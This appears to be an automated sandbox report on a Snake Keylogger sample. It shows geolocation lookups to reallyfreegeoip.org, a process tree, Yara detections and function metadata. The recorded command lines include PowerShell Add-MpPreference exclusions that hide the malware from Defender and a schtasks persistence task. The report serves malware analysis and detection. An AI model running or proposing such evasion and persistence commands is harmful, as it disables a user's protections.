2024-12-13 16:58:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	49782	172.67.177.134	443	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:20 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:20 UTC	873	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97869 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mMNRrE55fg3BPGIRzisR7w3TxrMQmLPsedtZ5xshqp5TTW5gHhoITtyAmtEjGl%2FLoXEiQOJM8n4jSQ0F7uw2YWpDV%2BzraXcjQWsN48sxnt2ueyVJY98ANX0i4YHcv9aGy0crE5Yv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f96fefb1865-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1480&rtt_var=569&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1901041&cwnd=195&unsent_bytes=0&cid=81c13b460c49496a&ts=451&x=0"
2024-12-13 16:58:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	49788	172.67.177.134	443	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:22 UTC	875	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97870 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pr3uUzkSvs65YTpWlSKe21fnUdBFrKXhg23%2Bf7vHcyJ5f0VYMGpovsHIJOUSyR0F%2Fe5S0Mtfv4UOFGhzk3KqZ67JS952C35VSba9gG00cr8Ye4zxRipnm2DCVzVjQY7a%2B7fa6vU5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f9e8d878c1d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1818&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1588683&cwnd=174&unsent_bytes=0&cid=252dc9eec3acca16&ts=471&x=0"
2024-12-13 16:58:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	49796	172.67.177.134	443	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:24 UTC	875	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97872 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ShR1em4PNmo1mWPlYgLxa1bFcwUTFB6SsEbW3p1PVDkQuITgQ1ihkQwhuHs7dZ2Z8LSG8bkJhukMowu6I4Va2AMv%2FNOaRjV3a63q76W0io0H5%2Fa6ydnAyi66uf%2BSnXPrB68VWr4j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177fab1b0d7c93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1796&rtt_var=688&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1574973&cwnd=210&unsent_bytes=0&cid=844882ac016282e1&ts=461&x=0"
2024-12-13 16:58:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.11	49797	172.67.177.134	443	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:24 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:58:25 UTC	879	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97874 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MoEiNBmn5OhB1iybZzLdDUDZhWTtNN%2BtJJtXfl62AmGU94jDbtPI6HZOGkuJXi%2B6%2FtIuoX9pT2XU4B1AhNrE6dBp0NertZ%2FQTQiY4i5ork%2Bm0K1FzCFtFLD5pZwZRjLTR66599Be"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177fb2eec00c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1805&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1568206&cwnd=241&unsent_bytes=0&cid=c5d52d0292b52c5e&ts=456&x=0"
2024-12-13 16:58:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.11	49804	172.67.177.134	443	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:26 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:27 UTC	887	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97876 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bufa8s8%2BXve4XXiHugw%2B%2BSFjYygrMjEQu9P8Zy5%2Fx5Z8pH6d8xOtVWX6U3K0JPXc4uSJm3ruSgghdh67ZEIaPFMjU2ubjdzilF%2FJvxdPX7C6ssQhhD9sRE%2Fl%2FntHFrJQd6%2BLdugV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177fbfabf47cff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=2037&rtt_var=771&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1413359&cwnd=219&unsent_bytes=0&cid=b4d19cd9619312f4&ts=455&x=0"
2024-12-13 16:58:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	4
Start time:	11:57:51
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x190000
File size:	640'512 bytes
MD5 hash:	30E5E5A39DF67A1138BF84DB89A5EB47
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:57:52
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
Imagebase:	0xea0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:57:52
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:57:55
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Imagebase:	0xea0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:57:55
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:57:55
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp"
Imagebase:	0x860000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:57:55
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:57:56
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x9d0000
File size:	640'512 bytes
MD5 hash:	30E5E5A39DF67A1138BF84DB89A5EB47
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3761812258.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3761812258.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	11:57:56
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\rXcourOVPD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rXcourOVPD.exe
Imagebase:	0x6f0000
File size:	640'512 bytes
MD5 hash:	30E5E5A39DF67A1138BF84DB89A5EB47
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:57:59
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmpAA33.tmp"
Imagebase:	0x860000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:57:59
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:57:59
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\rXcourOVPD.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Imagebase:	0x2d0000
File size:	640'512 bytes
MD5 hash:	30E5E5A39DF67A1138BF84DB89A5EB47
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:57:59
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\rXcourOVPD.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Imagebase:	0x340000
File size:	640'512 bytes
MD5 hash:	30E5E5A39DF67A1138BF84DB89A5EB47
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:57:59
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\rXcourOVPD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Imagebase:	0x5d0000
File size:	640'512 bytes
MD5 hash:	30E5E5A39DF67A1138BF84DB89A5EB47
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3762642230.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3762642230.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.1%
Total number of Nodes:	1354
Total number of Limit Nodes:	89

Executed Functions

Function 04AC76C8 Relevance: 13.2, Strings: 10, Instructions: 727
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 04AC7E2F
), xrefs: 04AC7D1B
4'_q, xrefs: 04AC76E2
), xrefs: 04AC7D77
), xrefs: 04AC7DD3
(, xrefs: 04AC7B36
(, xrefs: 04AC7F2C
(, xrefs: 04AC7B3D
., xrefs: 04AC7CA0
), xrefs: 04AC7E91

Memory Dump Source

Source File: 00000004.00000002.1359782961.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4ac0000_file.jbxd

Similarity

API ID:
String ID: ($($($)$)$)$)$)$.$4'_q
API String ID: 0-3363111672
Opcode ID: b3411917d1fca7913325a11f8e3dff21e7777b9e575dba134311c30437c99dd7
Instruction ID: 6b4ad74ed39bef7a83af57196915f090dd9952eb47c4db0649ab8ab5d7e69aea
Opcode Fuzzy Hash: b3411917d1fca7913325a11f8e3dff21e7777b9e575dba134311c30437c99dd7
Instruction Fuzzy Hash: 02628A34A00705CFDB05EF38C994B9977B2BF89304F1086A9D8096F369DB75A989CF90

Function 04AC76B8 Relevance: 13.2, Strings: 10, Instructions: 675
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 04AC7E2F
), xrefs: 04AC7D1B
4'_q, xrefs: 04AC76E2
), xrefs: 04AC7D77
), xrefs: 04AC7DD3
(, xrefs: 04AC7B36
(, xrefs: 04AC7F2C
(, xrefs: 04AC7B3D
., xrefs: 04AC7CA0
), xrefs: 04AC7E91

Memory Dump Source

Source File: 00000004.00000002.1359782961.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4ac0000_file.jbxd

Similarity

API ID:
String ID: ($($($)$)$)$)$)$.$4'_q
API String ID: 0-3363111672
Opcode ID: 1a6e885c4bc0beb3088ef7c128f33364d8dbc5abb00c7d0c72a76a9557aa943a
Instruction ID: 6d81dff52dee49d19cf15f347dafd2f6d24e9ec2e3c315496e42f153a4aa867b
Opcode Fuzzy Hash: 1a6e885c4bc0beb3088ef7c128f33364d8dbc5abb00c7d0c72a76a9557aa943a
Instruction Fuzzy Hash: 63528A34A00705CFDB04EF38C994A9977B2FF89304F1586A9D8096F369DB75A989CF90

Function 068403C8 Relevance: 6.9, Strings: 5, Instructions: 651
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hcq, xrefs: 06842F5B
Hcq, xrefs: 06842D8C
Hcq, xrefs: 06842CF9
Hcq, xrefs: 06842E9D
Hcq, xrefs: 06842E13

Memory Dump Source

Source File: 00000004.00000002.1360993619.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_file.jbxd

Similarity

API ID:
String ID: Hcq$Hcq$Hcq$Hcq$Hcq
API String ID: 0-1692708840
Opcode ID: fb08878f06552ad1bc1181a9ca4f3313ebf1f63597bf7084c50ca31d2743bb90
Instruction ID: 0a9ddf883e710ff903f47f54f7bf1f37b325af9fdc3973d390691c09dafc5dd3
Opcode Fuzzy Hash: fb08878f06552ad1bc1181a9ca4f3313ebf1f63597bf7084c50ca31d2743bb90
Instruction Fuzzy Hash: E9424530E042188FDB54EFA9C89479EBBF2AF88304F14859AE509EB355DB349D45CF91

Function 0B348CB8 Relevance: 5.3, Strings: 4, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

